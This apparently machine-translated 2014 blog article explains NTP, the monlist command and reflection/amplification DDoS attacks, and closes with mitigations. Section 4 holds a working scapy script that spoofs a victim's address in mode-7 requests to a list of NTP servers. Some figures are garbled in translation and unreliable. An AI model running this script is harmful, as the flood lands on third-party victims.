The reflection and amplification attacks & NTP reply flood attack based on NTP

Directory

1. NTP Introduction 2. NTP protocol Format 3. Relationship between NTP reflect reflection vulnerability and NTP protocol 4. Prerequisites for vulnerability triggering and steps required for attack 5. Reflection on attack and defense against the vulnerability

 

1. NTP Introduction

Network Time Protocol (NTP) is a protocol used to synchronize computer time. It can synchronize computers with their servers or clock sources (such as quartzels and GPS, it provides high-precision time correction (the difference between the LAN and the standard is less than 1 millisecond, And the Wan is dozens of milliseconds), and supports encrypted validation to prevent malicious protocol attacks.

NTP provides accurate time. First, an accurate time source is required. This time must be the International Standard Time UTC. The time source for obtaining the UTC time from NTP can be

1. Atomic Clock 2. Astronomical Observatory 3. Satellites 4. can also be obtained from the Internet

In this way, an accurate and reliable time source is available. The time is distributed according to the NTP server level. All servers are classified into different stratum (layers) based on the distance from the external UTC source.

1. stratum-1 at the top layer there is external UTC access 2. stratum-2 get time from stratum-1 3. Get time from Stratum-3Stratum-2, and so on

The total number of stratum layers is limited to 15. All these servers logically form a tiered architecture to connect to each other, while the time server of stratum-1 is the basis of the entire system. Computer hosts are generally connected to multiple time servers. Statistical algorithms are used to filter the time from different servers to select the optimal path and source to correct the host time. Even if the host cannot be associated with a server for a long time, the NTP service is still effective.
To prevent malicious damage to the time server, NTP uses an authentication mechanism to check whether the information actually comes from the declared server and check the data return path, to provide anti-interference protection mechanism

Introduction to NTP in RFC

http://www.rfc-editor.org/search/rfc_search_detail.php?title=NTP&pubstatus%5B%5D=Any&pub_date_type=any

0x1: Time Synchronization Based on NTP network protocol

Device A (client) and Device B (NTP server) are connected over the network. They all have their own independent system clock and need to implement automatic synchronization of their respective system clock through NTP

1. before the system clock of device A and Device B is synchronized, the clock of device A is set to 10:00:00 AM, and the clock of Device B is set to 11:00:00 am 2. device B acts as the NTP time server, that is, device A will synchronize its clock with Device B's clock 3. the time required for one-way transmission of NTP packets between device A and Device B is 1 second (the actual network latency may be greater than 1 second. device A sends an NTP packet to Device B. The packet carries the timestamp when it leaves device A, which is 10:00:00 am (T1) 5. when the NTP packet arrives at Device B, Device B adds its own timestamp, Which is 11:00:01 am (T2) 6. when the NTP packet leaves Device B, Device B adds its own timestamp, Which is 11:00:02 am (T3) 7. when device a receives the response message, the local time of device A is 10:00:03 am (T4)

During the entire NTP interaction process, both parties can obtain the parameters T1, T2, T3, and T4.

1. round-trip latency of NTP packets: delay = (T4-T1)-(T3-T2) = 2 seconds 2. time Difference Between device A and Device B: offset = (T2-T1) + (T3-T4)/2 = 1 hour

Through the addition and subtraction of the four parameters, we will find that the network delay is "eliminated" during transmission, and the transmission time difference is doubled through "elimination, after dividing 2, we get the time difference between the two endpoints.

Relevant link:

http://baike.baidu.com/view/60648.htmhttp://en.wikipedia.org/wiki/Network_Time_Protocolhttp://zh.wikipedia.org/wiki/%E7%B6%B2%E7%B5%A1%E6%99%82%E9%96%93%E5%8D%94%E8%AD%B0

 

2. NTP protocol format

For more information about NTP protocol formats, see

Http://www.cnblogs.com/littlehann/p/3810839.html//search :0x1: NTP network protocol

 

3. Relationship between NTP reflect reflection vulnerability and NTP protocol

To understand the NTP amplification attack, we need to focus on a field in the protocol, the "Mode" field, which indicates the type and purpose of the NTP datagram, there are a total of 7 Modes

0: Undefined 1: active peer mode 2: passive peer mode 3: Customer Mode 4: SERVER mode 5: broadcast mode or multicast mode 6: indicates that this packet is an NTP control packet (mode_control) 7: reserved for internal use (mode_private)

The NTP packet numbered 7 is reserved for ntpdc (NTP client installed by default in Linux GNU ).

Ntpdc supports many commands

ntpdc -n -i time-a.nist.govntpdc> ?

These commands have a risky command: monlist

Monlist command to obtain the last 600 Client IP addresses that have been synchronized with the target NTP server // This means that a small request packet, A continuous UDP packet consisting of a large number of active IP addresses can be obtained.

In this case, the actual attack effect is

1. The proportion of outgoing packets is 1: 732. The sent data volume and recycled data volume are 234 Bytes: 73x482bytes, which is approximately equal to 1: 5623. 10 m of communication traffic, and the attack traffic is 5620m.

From this analysis, we need to understand the concept of reflection. In essence, reflection attacks and IP Spoofing and Mac spoofing are a truth.

1. normal situation: the client and server establish UDP or TCP, and the data is transmitted between the client and server. reflection attacks: attackers forge the source IP address of the data packet as the victim's IP address and send it to the server. For the server, the data packet is from the victim's data packet, the server then responds to this packet and returns the corresponding response packet to the victim.

The connection-less communication mode of UDP further simplifies this process. Hackers can directly send a large number of forged packets to the server in "stateless mode" without establishing any valid connections.

Hackers can use the NTP server on the Internet to perform a reflection DDoS attack. Virtually, the NTP server helps the victim to initiate a large-volume attack unconsciously.

Relevant link:

http://chenjiji.com/post/3761.htmlhttp://blog.sina.com.cn/s/blog_459861630101b4wf.htmlhttp://www.douban.com/note/171309770/

 

4. Prerequisites and steps required for vulnerability triggering

The root cause of the NTP reflect DDoS attack vulnerability is the configuration vulnerability of the NTP server. Therefore, the prerequisite for triggering this vulnerability is that we can detect whether the server has this vulnerability.

1. Whether the 'Disable monitor' option is enabled in the NTP. conf configuration file 2. Whether a program is currently listening to UDP port 123

0x1: Test POC

#!/usr/bin/env python# author: pangzi.me@gmail.com import sysfrom scapy.all import * def attack(target, ntp_server):    send(IP(dst=ntp_server, src=target)/(UDP(sport=52816)/NTP(version=2, mode=7, stratum=0, poll=3, precision=42))) if __name__ == "__main__":    if len(sys.argv) != 3:        sys.exit(1)     target = sys.argv[1]    ntp_server_file = sys.argv[2]    for ntp_server in open(ntp_server_file, "r"):        ntp_server = ntp_server.strip()        if ntp_server != "":            attack(target, ntp_server)

0x2: NTP reflection Attack Cases

https://isc.sans.edu/forums/diary/NTP+reflection+attack/17300http://openntpproject.org/http://www.internetsociety.org/doc/amplification-hell-revisiting-network-protocols-ddos-abusehttp://blog.cloudflare.com/technical-details-behind-a-400gbps-ntp-amplification-ddos-attack/http://arstechnica.com/security/2014/01/new-dos-attacks-taking-down-game-sites-deliver-crippling-100-gbps-floods/https://www.us-cert.gov/ncas/alerts/TA14-013A

 

5. defense against vulnerabilities

Summarize the underlying causes of this vulnerability and we will find that

1. the non-equivalent switch of this command (1: 562 of the reward) is a single simple command that can obtain a large number of ECHO commands 2. the communication ambiguity of UDP protocol (without three-way handshake verification) hackers can send forged UDP Attack Packets at very low costs 3. as well as the non-authentication mechanism of NTP servers, reflective DDoS attacks become possible.

0x1: repair/defense methods

1. reinforce NTP service 1) Upgrade the NTP server to 4.2.7p26. 2) disable the monlist function of the NTP service. add the 'Disable monitor 'option to the conf configuration file. 3) Disable UDP 123 port at the network exit. 2. defense Against NTP reflection and amplification attacks 1) because of the obvious characteristics of such attacks, you can use the network layer or the carrier's implementation of ACL to defend against them 2) use anti-DDoS devices for cleaning

Relevant link:

http://drops.wooyun.org/papers/926

 

Copyright (c) 2014 littlehann All Rights Reserved

 

The reflection and amplification attacks & NTP reply flood attack based on NTP